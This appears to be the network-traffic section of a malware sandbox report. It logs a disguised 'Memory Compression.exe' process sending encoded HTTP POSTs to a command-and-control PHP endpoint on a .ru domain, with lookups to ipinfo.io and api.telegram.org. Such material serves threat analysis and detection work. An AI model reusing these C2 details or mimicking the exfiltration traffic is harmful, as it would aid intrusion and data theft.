                                                                                                                                Jan 11, 2025 15:04:35.580744982 CET5014580192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:35.584893942 CET8050144104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:35.584956884 CET5014480192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:35.585648060 CET8050145104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:35.585715055 CET5014580192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:35.585824013 CET5014580192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:35.590552092 CET8050145104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:35.939420938 CET5014580192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:35.944340944 CET8050145104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:36.068681002 CET8050145104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:36.247562885 CET8050145104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:36.251761913 CET5014580192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:36.373963118 CET5014680192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:36.373966932 CET5014580192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:36.378890038 CET8050146104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:36.378997087 CET8050145104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:36.379132032 CET5014580192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:36.379136086 CET5014680192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:36.379405975 CET5014680192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:36.384166956 CET8050146104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:36.739077091 CET5014680192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:36.744029999 CET8050146104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:36.842725992 CET8050146104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:36.955061913 CET5014680192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:37.015120983 CET8050146104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:37.064237118 CET5014680192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:37.145551920 CET5014680192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:37.146142006 CET5014780192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:37.150628090 CET8050146104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:37.150687933 CET5014680192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:37.151070118 CET8050147104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:37.151165009 CET5014780192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:37.151264906 CET5014780192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:37.156086922 CET8050147104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:37.501863003 CET5014780192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:37.506822109 CET8050147104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:37.614375114 CET8050147104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:37.751755953 CET5014780192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:37.856739044 CET8050147104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:37.912888050 CET5014780192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:37.987937927 CET5014780192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:37.988565922 CET5014880192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:37.993083000 CET8050147104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:37.993134975 CET5014780192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:37.993352890 CET8050148104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:37.993415117 CET5014880192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:37.993521929 CET5014880192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:37.998231888 CET8050148104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:38.345558882 CET5014880192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:38.350454092 CET8050148104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:38.446880102 CET8050148104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:38.548933983 CET5014880192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:38.618177891 CET8050148104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:38.737257004 CET5014980192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:38.737266064 CET5014880192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:38.742270947 CET8050149104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:38.742453098 CET8050148104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:38.742561102 CET5014880192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:38.742563009 CET5014980192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:38.742666006 CET5014980192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:38.747457981 CET8050149104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:39.095578909 CET5014980192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:39.100495100 CET8050149104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:39.187047005 CET8050149104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:39.267498016 CET5014980192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:39.349781036 CET8050149104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:39.454891920 CET5014980192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:39.470752001 CET5014980192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:39.471448898 CET5015080192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:39.471683979 CET5015180192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:39.475728035 CET8050149104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:39.475779057 CET5014980192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:39.476294041 CET8050150104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:39.476360083 CET5015080192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:39.476519108 CET8050151104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:39.476538897 CET5015080192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:39.476567984 CET5015180192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:39.476680994 CET5015180192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:39.481344938 CET8050150104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:39.481457949 CET8050151104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:39.829948902 CET5015080192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:39.829948902 CET5015180192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:39.834865093 CET8050150104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:39.834878922 CET8050151104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:39.834994078 CET8050151104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:39.920186996 CET8050151104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:39.920380116 CET8050150104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:40.048633099 CET5015080192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:40.064246893 CET5015180192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:40.098155975 CET8050150104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:40.098859072 CET5015180192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:40.104155064 CET8050151104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:40.104212046 CET5015180192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:40.218158960 CET5015080192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:40.218796968 CET5015280192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:40.223326921 CET8050150104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:40.223443031 CET5015080192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:40.223687887 CET8050152104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:40.224250078 CET5015280192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:40.224380016 CET5015280192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:40.229367971 CET8050152104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:40.580040932 CET5015280192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:40.585025072 CET8050152104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:40.676000118 CET8050152104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:40.753278971 CET5015280192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:40.941028118 CET8050152104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:41.048722982 CET5015280192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:41.073824883 CET5015280192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:41.079016924 CET8050152104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:41.079638004 CET5015280192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:41.114077091 CET5015380192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:41.118990898 CET8050153104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:41.119103909 CET5015380192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:41.119272947 CET5015380192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:41.124070883 CET8050153104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:41.470570087 CET5015380192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:41.475435972 CET8050153104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:41.562936068 CET8050153104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:41.751918077 CET5015380192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:41.826694012 CET8050153104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:42.064402103 CET5015380192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:04:42.066586971 CET8050153104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:04:42.066631079 CET5015380192.168.2.5104.21.38.84

                                                                                                                                UDP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Jan 11, 2025 15:02:21.427670956 CET6420253192.168.2.51.1.1.1
                                                                                                                                Jan 11, 2025 15:02:21.637706041 CET53642021.1.1.1192.168.2.5
                                                                                                                                Jan 11, 2025 15:03:03.067766905 CET6296153192.168.2.51.1.1.1
                                                                                                                                Jan 11, 2025 15:03:03.074489117 CET53629611.1.1.1192.168.2.5
                                                                                                                                Jan 11, 2025 15:03:04.552037954 CET5913653192.168.2.51.1.1.1
                                                                                                                                Jan 11, 2025 15:03:04.559401035 CET53591361.1.1.1192.168.2.5

                                                                                                                                DNS Queries

                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                Jan 11, 2025 15:02:21.427670956 CET192.168.2.51.1.1.10x16a2Standard query (0)586580cm.renyash.ruA (IP address)IN (0x0001)false
                                                                                                                                Jan 11, 2025 15:03:03.067766905 CET192.168.2.51.1.1.10x187eStandard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                                                                Jan 11, 2025 15:03:04.552037954 CET192.168.2.51.1.1.10xddf7Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                                DNS Answers

                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                Jan 11, 2025 15:02:21.637706041 CET1.1.1.1192.168.2.50x16a2No error (0)586580cm.renyash.ru104.21.38.84A (IP address)IN (0x0001)false
                                                                                                                                Jan 11, 2025 15:02:21.637706041 CET1.1.1.1192.168.2.50x16a2No error (0)586580cm.renyash.ru172.67.220.198A (IP address)IN (0x0001)false
                                                                                                                                Jan 11, 2025 15:03:03.074489117 CET1.1.1.1192.168.2.50x187eNo error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                                                                                                                Jan 11, 2025 15:03:04.559401035 CET1.1.1.1192.168.2.50xddf7No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                • ipinfo.io
                                                                                                                                • api.telegram.org
                                                                                                                                • 586580cm.renyash.ru

                                                                                                                                HTTP Packets

                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                0192.168.2.549729104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:02:21.654128075 CET309OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 344
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:02:22.003998995 CET344OUTData Raw: 00 07 01 01 03 0c 01 03 05 06 02 01 02 0d 01 0a 00 07 05 08 02 00 03 00 07 06 0a 05 04 05 02 07 0d 04 05 0a 02 57 03 07 0c 51 04 03 00 0a 07 0e 06 53 0c 0b 0d 52 05 06 06 57 04 0c 01 0a 07 0b 02 53 0d 09 05 01 05 51 0c 01 0d 06 0d 02 0c 51 05 06
                                                                                                                                Data Ascii: WQSRWSQQTR\L}Rk^zc\yMvvh|litohOkcZxcKxcaYhSPt`A~u~V@zmfA~rW
                                                                                                                                Jan 11, 2025 15:02:22.130273104 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:02:22.408520937 CET1236INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:02:22 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t4%2FIiwNdUjmrNKusJ%2FLpsyGGK%2B3%2FjaSvzSWJKRjgZIEr2sFQX8nMarPstHFAK1bdA2et4KWTj4vxqrGtfoGSD8fhrJ6dmeV5zKHReTc0uPazqj%2FsOOX%2FH9T4YT1bwj%2B9OYZuvAqk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900571b00bcf0f9b-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3226&min_rtt=1662&rtt_var=3751&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=653&delivery_rate=102998&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 35 32 63 0d 0a 56 4a 7e 05 78 0b 6b 06 7b 71 6b 5a 7e 72 7b 07 6a 59 5e 50 68 4e 65 0a 7b 73 5e 01 7f 62 51 5b 74 05 7d 42 6e 5f 65 49 77 66 64 06 7e 4b 78 01 55 4b 72 54 74 71 7f 4b 7f 5c 7a 5e 68 59 76 08 78 00 73 54 69 73 5e 58 77 62 69 41 77 5f 79 00 7f 61 58 04 7e 52 64 09 7e 67 59 49 61 4c 7b 06 7c 5b 69 03 7d 5e 72 5b 78 77 7b 59 7b 67 70 01 6c 7e 7c 5c 79 61 7f 5d 6c 60 71 5f 68 73 7f 5b 7b 67 60 02 6a 5c 51 40 75 07 78 03 7a 51 41 5b 6b 67 74 40 7f 61 53 40 75 6c 7c 4c 78 6c 63 5b 77 59 7d 54 6e 5f 5f 48 69 52 65 5f 6c 58 7e 46 76 5a 63 03 77 72 70 03 60 62 6e 50 7e 5d 7a 06 60 5b 7d 06 61 66 6c 09 7f 6c 66 5d 77 6f 77 5d 7f 4d 6f 59 78 6c 67 03 7b 5e 65 5b 6b 6d 68 08 77 67 6f 5e 69 62 53 50 7e 53 6f 09 6f 53 75 5d 6a 62 53 40 7b 5d 46 51 68 52 51 54 69 63 68 4f 7d 64 7a 05 7b 6d 60 5e 78 04 7c 48 7f 71 6b 02 7d 77 52 53 7e 70 75 42 7b 70 74 4f 69 62 70 49 63 73 65 51 7b 5c 79 06 75 48 52 06 7d 48 74 02 7d 58 53 0d 74 5c 6b 01 7f 72 57 01 7c 49 76 40 7b 76 74 41 7d 4d 77 00 77 72 69 06 74 [TRUNCATED]
                                                                                                                                Data Ascii: 52cVJ~xk{qkZ~r{jY^PhNe{s^bQ[t}Bn_eIwfd~KxUKrTtqK\z^hYvxsTis^XwbiAw_yaX~Rd~gYIaL{|[i}^r[xw{Y{gpl~|\ya]l`q_hs[{g`j\Q@uxzQA[kgt@aS@ul|Lxlc[wY}Tn__HiRe_lX~FvZcwrp`bnP~]z`[}afllf]wow]MoYxlg{^e[kmhwgo^ibSP~SooSu]jbS@{]FQhRQTichO}dz{m`^x|Hqk}wRS~puB{ptOibpIcseQ{\yuHR}Ht}XSt\krW|Iv@{vtA}MwwritqaG|_~}lp~gUu_Ux\u}pixIp{w|xSwFyrtx]n|N`xYl|bcua|}|gE}wpOO}Cw|`Ox|Zw^bAyqyG}BvL{aXvMs
                                                                                                                                Jan 11, 2025 15:02:22.408584118 CET895INData Raw: 77 71 74 05 76 61 7e 43 7f 70 6a 4d 77 5c 53 4c 76 75 6c 41 7f 6c 65 4d 77 7c 68 07 7c 73 5e 07 7b 42 55 02 78 60 7e 06 7f 53 7c 43 74 59 6c 05 7d 5c 54 0c 7e 6d 7b 09 7a 6d 7e 4c 7d 72 57 07 7f 4e 56 41 7c 6c 74 43 7d 4e 74 40 7d 67 76 4c 7a 6d
                                                                                                                                Data Ascii: wqtva~CpjMw\SLvulAleMw|h|s^{BUx`~S|CtYl}\T~m{zm~L}rWNVA|ltC}Nt@}gvLzmUx\pq{}Ig^yzs^rRItMSOy_euvd}X`~X_tbQ|bSITN{f^|ccvL_LtOS|ajF~lp}YsDvqUxbSG~N}IxIhywZLxmQFy\pK{sb{]NZoIX~roOb_d|l}wpbQbol{l|`^r{qv
                                                                                                                                Jan 11, 2025 15:02:22.490838051 CET285OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 384
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 11, 2025 15:02:22.593739033 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:02:22.593991995 CET384OUTData Raw: 5a 52 58 58 5f 53 58 5d 5c 5f 50 57 54 5c 59 58 59 54 5b 5e 57 56 54 5c 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZRXX_SX]\_PWT\YXYT[^WVT\[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"& ,<!77%0/)!=?4)9'2W<@;_67'=.^''P*
                                                                                                                                Jan 11, 2025 15:02:22.859626055 CET957INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:02:22 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EYtheXfNe%2FuDwfdYbciC9BQDJ83Z3r%2F9WBRMfM8Txf8%2Bu9JD0EOBveOJkd0B25vS7JBZTobLkYv9hDc%2FwUYlfWfCgJ480COKuZOPHBFMqm9raxNz16n0p4YX2fHO76SraRVEjQ6v"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900571b2ef0d0f9b-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=5136&min_rtt=1654&rtt_var=6573&sent=9&recv=10&lost=0&retrans=0&sent_bytes=2181&recv_bytes=1322&delivery_rate=2488636&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 09 1f 27 59 36 07 26 54 22 2b 0b 0a 3e 0f 23 5f 24 33 26 05 2a 22 0b 03 27 3b 24 5b 3a 38 09 0a 36 29 27 04 25 3e 3a 01 25 3e 2e 57 2b 01 2c 5d 00 10 23 40 27 0d 3e 00 2d 0c 2a 08 2a 57 2c 45 34 3c 0d 5f 27 2b 39 0c 23 23 27 5d 20 04 3a 02 2f 21 28 0a 2c 34 08 5b 3a 01 3f 00 22 35 2b 55 00 14 20 52 26 29 1a 5e 3d 33 1d 09 20 2b 32 1f 24 15 2c 54 2a 02 38 52 3d 3b 26 0d 3c 2f 3e 57 23 2f 29 5e 28 23 3f 18 25 22 03 56 27 2c 21 5f 23 0d 2e 54 0d 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98'Y6&T"+>#_$3&*"';$[:86)'%>:%>.W+,]#@'>-**W,E4<_'+9##'] :/!(,4[:?"5+U R&)^=3 +2$,T*8R=;&</>W#/)^(#?%"V',!_#.T?WT0
                                                                                                                                Jan 11, 2025 15:02:22.937797070 CET286OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 11, 2025 15:02:23.038374901 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:02:23.038585901 CET1060OUTData Raw: 5a 55 5d 5c 5a 5c 5d 56 5c 5f 50 57 54 50 59 5c 59 55 5b 50 57 56 54 58 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZU]\Z\]V\_PWTPY\YU[PWVTX[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!20$]?28\!!-';?)%=+49>S'?"T+'[5$;S).^''P*1
                                                                                                                                Jan 11, 2025 15:02:23.297724962 CET811INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:02:23 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bZlBauhUnmQC%2F%2F1YYW6dpkeNdeHfvYcGbOezagbZppWtNQ728VVdnRTSGFl%2Fn7eEknJBBJ%2Bg4hudZERhnY%2FBZjNZbdW81PhFOkBaaBXRNAoj3xS18jAygVgdiMiM3Pb8cAQWEzar"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900571b5b9630f9b-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=5686&min_rtt=1654&rtt_var=6285&sent=14&recv=14&lost=0&retrans=0&sent_bytes=3163&recv_bytes=2668&delivery_rate=2488636&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                1192.168.2.549739104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:02:23.052637100 CET286OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1756
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 11, 2025 15:02:23.469059944 CET1756OUTData Raw: 5f 56 5d 54 5f 5b 5d 53 5c 5f 50 57 54 52 59 5e 59 51 5b 59 57 52 54 5e 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _V]T_[]S\_PWTRY^YQ[YWRT^[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!\&0+2<[#W6_0%>*=\)< T'Y"+68!Q?>;.^''P*
                                                                                                                                Jan 11, 2025 15:02:23.507082939 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:02:23.809765100 CET955INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:02:23 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EPHdgTllI8FwXcnyBJKGpRFh7mzpCelgWm6u8exQ4zkE350exsjmC2Dt9Bu%2FrStd8%2Bv%2BuZPMgEkXN89yhaBA7X5FxXPjCuDOmFUmX%2F3jhVJLls1KS1rntNX%2BkmkXDA03DJKMlkQo"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900571b8a98142bb-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
